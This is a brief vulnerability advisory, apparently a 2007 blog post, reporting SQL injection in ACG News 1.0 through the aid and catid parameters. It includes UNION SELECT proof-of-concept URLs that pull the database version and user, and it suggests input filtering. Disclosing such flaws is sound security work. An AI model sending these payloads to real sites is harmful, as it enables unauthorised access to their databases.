Software: ACG News 1.0
Vendor link: http://www.altercoder.com
Vendor Demo link: http://acgnews.uw.hu/index.php
Attack: SQL Injection
Discovered by: David Sopas Ferreira a.k.a SmOk3 < smok3f00 at gmail.com >
SQL Injection
-------------
An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. Vulnerable variables are $aid and $catid on index.php file.
Proof of Concept:
index.php?menu=showarticle&aid=[SQL INJECTION]
index.php?menu=showarticle&aid=-3 UNION ALL SELECT 1,@@version,3,4,5,user(),7
index.php?menu=showcat&catid=[SQL INJECTION]
index.php?menu=showcat&catid=-3 UNION ALL SELECT 1,@@version
Solution:
Your script should filter metacharacters from user input.
Vendor (Liam Dawe) is already fixing all the problems that I found out, a few more were added by myself...
Proof Of Concept
SQL Injection:
printable.php?aid=-3%20UNION%20ALL%20SELECT%201,@@version
,3,4,5,user(),7
Tuesday, August 28, 2007
ACG News SQL Injection
Posted by
SmOk3
at
6:43 AM
Labels: acg news, acgnews, sql injection
Subscribe to:
Post Comments (Atom)

0 comments:
Post a Comment